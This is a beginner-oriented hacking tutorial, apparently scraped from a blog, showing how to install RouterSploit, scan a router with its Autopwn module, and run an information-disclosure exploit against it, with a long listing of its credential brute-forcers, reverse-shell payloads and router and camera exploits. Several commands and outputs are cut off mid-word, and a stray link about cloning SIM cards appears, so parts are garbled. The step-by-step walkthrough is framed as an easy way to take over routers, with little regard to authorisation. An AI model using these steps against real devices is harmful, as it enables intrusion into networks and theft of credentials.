we're exploring RouterSploit, which shows you just how easy it is to get started with router hacking — even if you're a beginner white hat hacker or pentester. This program A router is the core of anyone's internet experience, but most people don't spend much time setting up this critical piece of hardware. Old firmware, default passwords, and other configuration issues continue to haunt many organizations. Exploiting the poor, neglected computer inside these routers has become so popular and easy that automated tools have been created to make the process a breeze.
In this hacking tutorial, we'll learn how to use
RouterSploit , a tool for automating the process of router exploitation. But before we dive right in, let's get a little background information on the tools available and why router exploitation is so big. on Linux distros like Kali, macOS, and Windows.
Download App:- Tech Gyan Mantra
The Basics Behind Router Exploitation
Router exploitation works by breaching the Wi-Fi security of a router, bypassing the administrative login page, and accessing administrative features. A skilled attacker can then target the existing firmware that runs the router in a practice called "rootkitting" in which custom firmware is dropped into the router to enable advanced malicious features.
Depending on the goals and resources of an attacker, this can include spying on the user and any connected devices, injecting malware into the browser to exploit connected devices, enabling advanced spear-phishing attacks, and routing illegal traffic for criminal activities through exploited routers.
Government Router Hacking with Cherry Blossom
Government agencies like the NSA and CIA hoard exploits for routers, and the ShadowBrokers have threatened to release these exploits on the heels of the Windows SMB leaks that spawned WanaCry (or WannaCry) . If they follow through with the threats to leak router exploits in June, tools like
Cherry Blossom could become mainstream.
How To Clone Your Sim Card.complete Method
These tools from the NSA and CIA control entire networks of infected routers, transforming them into advanced, on-site wireless espionage devices. Why plant a fancy spying device when you can just turn a home router into one?
Cherry Blossom is a rootkitting master framework, in which routers are automatically exploited and converted into "flytraps." A flytrap is a router that has been compromised and updated with special firmware that prevents the user from updating or modifying the new firmware.
Cherry Blossom can control many "flytraps," providing instant access to advance spying devices located in the home or work of a target.
Image via Cherry Blossom Quick Start Guide / WikiLeaks / CIA
The flytrap establishes a "beacon" back to a command-and-control server called "Cherryweb," and is then assigned "missions" by an operator via an encrypted VPN tunnel. Advanced modules, like "Windex," which performs a drive-by malware injection attack against any connected target, can turn a flytrap into an advanced remote espionage platform capable of being controlled from anywhere.
Cherry Blossom displaying mission commands to be sent to flytrap devices, including shell code, recon scripts, and exploits. Some poor guy is going to get his Cherry Blossomed.
Image via Cherry Blossom Quickstart Guide / WikiLeaks / CIA
Criminal IoT & Router Hacking
Aside from the espionage application the CIA focuses on, exploitable routers and IoT devices are commonly targeted because of their routing ability. RouterSploit, the tool we're working with today, doesn't just compromise routers, it can also go after webcams and other connected devices.
While the CIA uses VPN connections to hide traffic to and from command-and-control servers, cybercriminals will use these devices to proxy malicious traffic to avoid detection. In fact, networks of these infected routers and IoT devices are sold as black market proxies for hiding illegal activity like credit card theft, darknet transactions, and DDoS attacks. By failing to secure your router, you could be signing up to relay traffic for criminal hacking enterprises.
Beginner Router Hacking
While simply trying the default password is the first step towards router exploitation, more advanced frameworks exist even for beginners. Why would a beginner want to exploit a router? On a local level, if you fully compromise the router, you will have complete access to the network. This allows you to control and route the target's internet experience to wherever or whatever you want or forward ports for remote access.
You should consider a router as an early and productive target to take on during the stages of an engagement. Even if you're a beginner, simply running the Autopwn scanner on RouterSploit will automatically test a range of vulnerabilities against a target IP address, reducing the process of finding a potential exploit to a matter of seconds.
What Is RouterSploit ?
RouterSploit is a handy Python program which automates most of the tasks associated with compromising a router. Modeled after
Metasploit , its commands will be familiar to anyone used to the Metasploit framework. It contains scanning and exploit modules and is available for Kali Linux (and macOS or Mac OS X if you want).
Once you associate with a target network, running a scan will reveal whether a router can be easily exploited through the framework. Today, we will be going over the Autopwn feature to identify vulnerabilities on routers and connected devices quickly.
Getting It Running — What You' ll Need
RouterSploit is great because it runs on Kali Linux, our Kali Raspberry Pi , macOS or Mac OS X, Windows, and even on an unrooted Android phone. To start, we'll need to take care of some dependencies and ensure Python is installed. Aside from that, compromising a router has never been easier from any device you have handy.
STEP:- 1
Installing Python & Dependencies
To proceed, we'll need to ensure we have Python installed, and you'll also need some of the following packages.
- Python3 (with pip)
- Requests
- Paramiko
- Beautifulsoup4
- Pysnmp
- Gnureadline (macOS / Mac OS X only)
You can install them all
by using apt-get :
apt-get install python3-pip request
STEP:- 2
Installing RouterSploit on Mac , Kali & Others
git clone https://github.com/threa cd routersploit python3 -m pip install -r requirem python3 rsf.py
On macOS or Mac OS X, the method is similar. In a terminal window, type:
git clone https://github.com/threa cd routersploit sudo easy_install pip sudo pip install -r requirements.t
STEP :- 3
Running RouterSploit
For our first run, connect your computer to a network with a router you'd like to scan. Navigate to the RouterSploit folder and run RouterSploit by typing the following commands.
cd cd routersploit sudo python ./rsf.py
The RouterSploit framework will open up, and you'll see that it bears a striking similarity to the Metasploit framework, both in interface style and workflow.
A command-line interface lets you input simple commands to scan and exploit routers, and you can see everything RouterSploit has to offer by typing:
show all
As you can see in the below output, there are lots of exploits, default creds, and scanners! How fun.
creds/generic/snmp_bruteforce creds/generic/telnet_default creds/generic/ssh_default creds/generic/ftp_bruteforce creds/generic/http_basic_digest_br creds/generic/ftp_default creds/generic/http_basic_digest_de creds/generic/ssh_bruteforce creds/generic/telnet_bruteforce creds/routers/ipfire/ssh_default_c creds/routers/ipfire/telnet_defaul creds/routers/ipfire/ftp_default_c creds/routers/bhu/ssh_default_cred creds/routers/bhu/telnet_default_c creds/routers/bhu/ftp_default_cred creds/routers/linksys/ssh_default_ creds/routers/linksys/telnet_defau creds/routers/linksys/ftp_default_ creds/routers/technicolor/ssh_defa creds/routers/technicolor/telnet_d creds/routers/technicolor/ftp_defa creds/routers/asus/ssh_default_cre creds/routers/asus/telnet_default_ creds/routers/asus/ftp_default_cre creds/routers/billion/ssh_default_ creds/routers/billion/telnet_defau creds/routers/billion/ftp_default_ creds/routers/zte/ssh_default_cred creds/routers/zte/telnet_default_c creds/routers/zte/ftp_default_cred creds/routers/ubiquiti/ssh_default creds/routers/ubiquiti/telnet_defa creds/routers/ubiquiti/ftp_default creds/routers/asmax/ssh_default_cr creds/routers/asmax/telnet_default creds/routers/asmax/ftp_default_cr creds/routers/asmax/webinterface_ht creds/routers/huawei/ssh_default_c creds/routers/huawei/telnet_defaul creds/routers/huawei/ftp_default_c creds/routers/tplink/ssh_default_c creds/routers/tplink/telnet_defaul creds/routers/tplink/ftp_default_c creds/routers/netgear/ssh_default_ creds/routers/netgear/telnet_defau creds/routers/netgear/ftp_default_ creds/routers/mikrotik/ssh_default creds/routers/mikrotik/telnet_defa creds/routers/mikrotik/ftp_default creds/routers/mikrotik/api_ros_def creds/routers/movistar/ssh_default creds/routers/movistar/telnet_defa creds/routers/movistar/ftp_default creds/routers/dlink/ssh_default_cr creds/routers/dlink/telnet_default creds/routers/dlink/ftp_default_cr creds/routers/juniper/ssh_default_ creds/routers/juniper/telnet_defau creds/routers/juniper/ftp_default_ creds/routers/comtrend/ssh_default creds/routers/comtrend/telnet_defa creds/routers/comtrend/ftp_default creds/routers/fortinet/ssh_default creds/routers/fortinet/telnet_defa creds/routers/fortinet/ftp_default creds/routers/belkin/ssh_default_c creds/routers/belkin/telnet_defaul creds/routers/belkin/ftp_default_c creds/routers/netsys/ssh_default_c creds/routers/netsys/telnet_defaul creds/routers/netsys/ftp_default_c creds/routers/pfsense/ssh_default_ creds/routers/pfsense/webinterface_ creds/routers/zyxel/ssh_default_cr creds/routers/zyxel/telnet_default creds/routers/zyxel/ftp_default_cr creds/routers/thomson/ssh_default_ creds/routers/thomson/telnet_defau creds/routers/thomson/ftp_default_ creds/routers/netcore/ssh_default_ creds/routers/netcore/telnet_defau creds/routers/netcore/ftp_default_ creds/routers/cisco/ssh_default_cr creds/routers/cisco/telnet_default creds/routers/cisco/ftp_default_cr creds/cameras/grandstream/ssh_defa creds/cameras/grandstream/telnet_d creds/cameras/grandstream/ftp_defa creds/cameras/basler/ssh_default_c creds/cameras/basler/webinterface_ creds/cameras/basler/telnet_defaul creds/cameras/basler/ftp_default_c creds/cameras/avtech/ssh_default_c creds/cameras/avtech/telnet_defaul creds/cameras/avtech/ftp_default_c creds/cameras/vacron/ssh_default_c creds/cameras/vacron/telnet_defaul creds/cameras/vacron/ftp_default_c creds/cameras/acti/ssh_default_cre creds/cameras/acti/webinterface_ht creds/cameras/acti/telnet_default_ creds/cameras/acti/ftp_default_cre creds/cameras/sentry360/ssh_defaul creds/cameras/sentry360/telnet_def creds/cameras/sentry360/ftp_defaul creds/cameras/siemens/ssh_default_ creds/cameras/siemens/telnet_defau creds/cameras/siemens/ftp_default_ creds/cameras/american_dynamics/ss creds/cameras/american_dynamics/te creds/cameras/american_dynamics/ft creds/cameras/videoiq/ssh_default_ creds/cameras/videoiq/telnet_defau creds/cameras/videoiq/ftp_default_ creds/cameras/jvc/ssh_default_cred creds/cameras/jvc/telnet_default_c creds/cameras/jvc/ftp_default_cred creds/cameras/speco/ssh_default_cr creds/cameras/speco/telnet_default creds/cameras/speco/ftp_default_cr creds/cameras/iqinvision/ssh_defau creds/cameras/iqinvision/telnet_de creds/cameras/iqinvision/ftp_defau creds/cameras/avigilon/ssh_default creds/cameras/avigilon/telnet_defa creds/cameras/avigilon/ftp_default creds/cameras/canon/ssh_default_cr creds/cameras/canon/telnet_default creds/cameras/canon/ftp_default_cr creds/cameras/canon/webinterface_ht creds/cameras/hikvision/ssh_defaul creds/cameras/hikvision/telnet_def creds/cameras/hikvision/ftp_defaul creds/cameras/dlink/ssh_default_cr creds/cameras/dlink/telnet_default creds/cameras/dlink/ftp_default_cr creds/cameras/honeywell/ssh_defaul creds/cameras/honeywell/telnet_def creds/cameras/honeywell/ftp_defaul creds/cameras/samsung/ssh_default_ creds/cameras/samsung/telnet_defau creds/cameras/samsung/ftp_default_ creds/cameras/axis/ssh_default_cre creds/cameras/axis/telnet_default_ creds/cameras/axis/ftp_default_cre creds/cameras/axis/webinterface_ht creds/cameras/arecont/ssh_default_ creds/cameras/arecont/telnet_defau creds/cameras/arecont/ftp_default_ creds/cameras/brickcom/ssh_default creds/cameras/brickcom/telnet_defa creds/cameras/brickcom/ftp_default creds/cameras/brickcom/webinterface creds/cameras/mobotix/ssh_default_ creds/cameras/mobotix/telnet_defau creds/cameras/mobotix/ftp_default_ creds/cameras/geovision/ssh_defaul creds/cameras/geovision/telnet_def creds/cameras/geovision/ftp_defaul creds/cameras/stardot/ssh_default_ creds/cameras/stardot/telnet_defau creds/cameras/stardot/ftp_default_ creds/cameras/cisco/ssh_default_cr creds/cameras/cisco/telnet_default creds/cameras/cisco/ftp_default_cr payloads/perl/bind_tcp payloads/perl/reverse_tcp payloads/python/bind_tcp payloads/python/reverse_tcp payloads/python/bind_udp payloads/python/reverse_udp payloads/mipsbe/bind_tcp payloads/mipsbe/reverse_tcp payloads/armle/bind_tcp payloads/armle/reverse_tcp payloads/x86/bind_tcp payloads/x86/reverse_tcp payloads/php/bind_tcp payloads/php/reverse_tcp payloads/cmd/php_reverse_tcp payloads/cmd/python_reverse_tcp payloads/cmd/python_bind_tcp payloads/cmd/perl_reverse_tcp payloads/cmd/netcat_reverse_tcp payloads/cmd/awk_reverse_tcp payloads/cmd/awk_bind_tcp payloads/cmd/bash_reverse_tcp payloads/cmd/php_bind_tcp payloads/cmd/awk_bind_udp payloads/cmd/netcat_bind_tcp payloads/cmd/perl_bind_tcp payloads/cmd/python_reverse_udp payloads/cmd/python_bind_udp payloads/x64/bind_tcp payloads/x64/reverse_tcp payloads/mipsle/bind_tcp payloads/mipsle/reverse_tcp scanners/autopwn scanners/misc/misc_scan scanners/routers/router_scan scanners/cameras/camera_scan exploits/generic/shellshock exploits/generic/ssh_auth_keys exploits/generic/heartbleed exploits/misc/asus/b1m_projector_r exploits/misc/wepresent/wipg1000_r exploits/misc/miele/pg8528_path_tr exploits/routers/ipfire/ipfire_oin exploits/routers/ipfire/ipfire_pro exploits/routers/ipfire/ipfire_she exploits/routers/2wire/gateway_aut exploits/routers/2wire/4011g_5012n exploits/routers/bhu/bhu_urouter_r exploits/routers/linksys/1500_2500 exploits/routers/linksys/smartwifi exploits/routers/linksys/wrt100_11 exploits/routers/linksys/wap54gv3_ exploits/routers/technicolor/tg784 exploits/routers/technicolor/tc720 exploits/routers/technicolor/dwg85 exploits/routers/technicolor/tc720 exploits/routers/asus/infosvr_back exploits/routers/asus/rt_n16_passw exploits/routers/billion/billion_52 exploits/routers/billion/billion_77 exploits/routers/zte/f460_f660_bac exploits/routers/zte/zxv10_rce exploits/routers/ubiquiti/airos_6_ exploits/routers/asmax/ar_1004g_pa exploits/routers/asmax/ar_804_gu_r exploits/routers/huawei/hg520_info exploits/routers/huawei/hg866_pass exploits/routers/huawei/hg530_hg52 exploits/routers/huawei/e5331_mifi exploits/routers/tplink/wdr740nd_w exploits/routers/tplink/archer_c2_ exploits/routers/tplink/wdr740nd_w exploits/routers/tplink/wdr842nd_w exploits/routers/netgear/jnr1010_p exploits/routers/netgear/n300_auth exploits/routers/netgear/multi_pass exploits/routers/netgear/dgn2200_d exploits/routers/netgear/prosafe_rc exploits/routers/netgear/r7000_r64 exploits/routers/netgear/multi_rce exploits/routers/netgear/wnr500_61 exploits/routers/netgear/dgn2200_p exploits/routers/mikrotik/routeros exploits/routers/movistar/adsl_rou exploits/routers/dlink/dsp_w110_rc exploits/routers/dlink/dgs_1510_ad exploits/routers/dlink/dir_645_815 exploits/routers/dlink/dir_815_850 exploits/routers/dlink/dir_300_320 exploits/routers/dlink/dir_645_pas exploits/routers/dlink/dir_850l_cr exploits/routers/dlink/dvg_n5402sp exploits/routers/dlink/dsl_2640b_d exploits/routers/dlink/dcs_930l_au exploits/routers/dlink/dir_825_pat exploits/routers/dlink/multi_hedwi exploits/routers/dlink/dns_320l_32 exploits/routers/dlink/dsl_2730_27 exploits/routers/dlink/dsl_2750b_i exploits/routers/dlink/dir_300_600 exploits/routers/dlink/dwl_3200ap_ exploits/routers/dlink/dsl_2740r_d exploits/routers/dlink/dir_8xx_pas exploits/routers/dlink/dwr_932b_ba exploits/routers/dlink/dsl_2730b_2 exploits/routers/dlink/dwr_932_inf exploits/routers/dlink/dir_300_320 exploits/routers/dlink/dsl_2750b_r exploits/routers/dlink/multi_hnap_ exploits/routers/dlink/dir_300_645 exploits/routers/3com/ap8760_passw exploits/routers/3com/imc_path_tra exploits/routers/3com/officeconnec exploits/routers/3com/officeconnec exploits/routers/3com/imc_info_dis exploits/routers/comtrend/ct_5361t exploits/routers/fortinet/fortigate exploits/routers/multi/rom0 exploits/routers/multi/tcp_32764_r exploits/routers/multi/misfortune_ exploits/routers/multi/tcp_32764_i exploits/routers/multi/gpon_home_g exploits/routers/belkin/g_plus_inf exploits/routers/belkin/play_max_p exploits/routers/belkin/n150_path_ exploits/routers/belkin/n750_rce exploits/routers/belkin/g_n150_pas exploits/routers/belkin/auth_bypas exploits/routers/netsys/multi_rce exploits/routers/shuttle/915wm_dns exploits/routers/zyxel/d1000_rce exploits/routers/zyxel/p660hn_t_v2 exploits/routers/zyxel/d1000_wifi_ exploits/routers/zyxel/zywall_usg_ exploits/routers/zyxel/p660hn_t_v1 exploits/routers/thomson/twg850_pa exploits/routers/thomson/twg849_in exploits/routers/netcore/udp_53413 exploits/routers/cisco/secure_acs_ exploits/routers/cisco/catalyst_29 exploits/routers/cisco/ucs_manager exploits/routers/cisco/unified_mult exploits/routers/cisco/firepower_m exploits/routers/cisco/firepower_m exploits/routers/cisco/video_surv_ exploits/routers/cisco/dpc2420_inf exploits/routers/cisco/ios_http_au exploits/routers/cisco/ucm_info_di exploits/cameras/grandstream/gxv36 exploits/cameras/grandstream/gxv36 exploits/cameras/mvpower/dvr_jaws_ exploits/cameras/siemens/cvms2025_ exploits/cameras/avigilon/videoiq_ exploits/cameras/xiongmai/uc_httpd exploits/cameras/dlink/dcs_930l_93 exploits/cameras/honeywell/hicc_11 exploits/cameras/brickcom/corp_net exploits/cameras/brickcom/users_cg exploits/cameras/multi/P2P_wificam exploits/cameras/multi/dvr_creds_d exploits/cameras/multi/jvc_vanderb exploits/cameras/multi/netwave_ip_ exploits/cameras/multi/P2P_wificam generic/bluetooth/btle_enumerate generic/bluetooth/btle_scan generic/bluetooth/btle_write generic/upnp/ssdp_msearch rsf >
To begin, we'll start with a scan against a target router, which will check to see if each and every vulnerability might work against it. It will return a list at the end of the scan with every exploit that will work against the target — no research required.
STEP:- 4
Scanning a Target
We will be using Autopwn scanner to find any vulnerabilities that apply to our target. Locate the IP address of the router, and save it, because we'll need it to input it shortly. Most of the time, the router is at 192.168. 0.1, but this can change. You can use Fing or ARP-scan to find the IP address if you don't know it.
After starting RouterSploit, enter the Autopwn module by typing the following commands.
use scanners/autopwn show options
This is very similar to Metasploit. To get around, type use and then whatever module you want to use, show options to show the variables of that module you've selected, set to set any of the variables you see from the show options command, and finally, run to execute the module. Pretty simple. To close out of the module and take you to the main screen, type
exit .
In this case, we will set the target to the IP address of the router. Type set target and then the IP address of the router, then press enter. Finally, type run to begin the scan.
rsf (AutoPwn) > set target 10.11.0 [+] {'target': '10.11.0.4'} rsf (AutoPwn) > run
STEP:- 5
Selecting & Configuring the Exploit
After the scan is complete, we'll be left with a list of vulnerabilities it finds. We can pick from this list to decide which exploit best suits our needs. Here, we see a router with many vulnerabilities.
[*] Elapsed time: ``9.301568031 s
[*] Could not verify exploitabilit - exploits/routers/billion/5200w_ - exploits/routers/cisco/catalyst - exploits/routers/cisco/secure_a - exploits/routers/dlink/dir_815_ - exploits/routers/dlink/dsl_2640 - exploits/routers/dlink/dsl_2730 - exploits/routers/dlink/dsl_2740 - exploits/routers/netgear/dgn220 - exploits/routers/shuttle/915wm_
[*] Device is vulnerable: - exploits/routers/3com/3crads172 - exploits/routers/3com/officialc - exploits/routers/dlink/dcs_9301 - exploits/routers/dlink/dir_300_ - exploits/routers/ipfire/ipfire_ - exploits/routers/linksys/1500_2 - exploits/routers/netgear/prosaf - exploits/routers/zyxel/zywall_u - exploits/routers/dlink/dcs_9301
rsf (AutoPwn) >
Let's start with a simple exploit on one of these vulnerable routers, some revealing information disclosure. To use this exploit, we'll enter the following commands.
use exploits/routers/3com/3cradsl7 show options
A list of the variables will come up, and you'll be able to set your target by typing:
set target <target router IP> check
This will set the target and confirm it is vulnerable.
STEP :- 6
Running the Exploit
The target looks good and vulnerable. To fire the payload, type run .
rsf (3Com 3CRADSL72 Info Disclosur
[*] Running module...
[*] Sending request to download s /Library/Frameworks/Python.framewo
[+] Exploit success
[*] Reading /app_sta.stm file
<!doctype html>
<html class="">
<!--
If the exploit is successful, you should be greeted with internal configuration settings that can leak the login and password of users, default passwords, and device serial number, among other settings that allow you to compromise the router. Other modules allow you to remotely inject code or directly disclose the router password. Which you can run depends on what the target router is vulneralibilty.
WATCH VIDEO:-
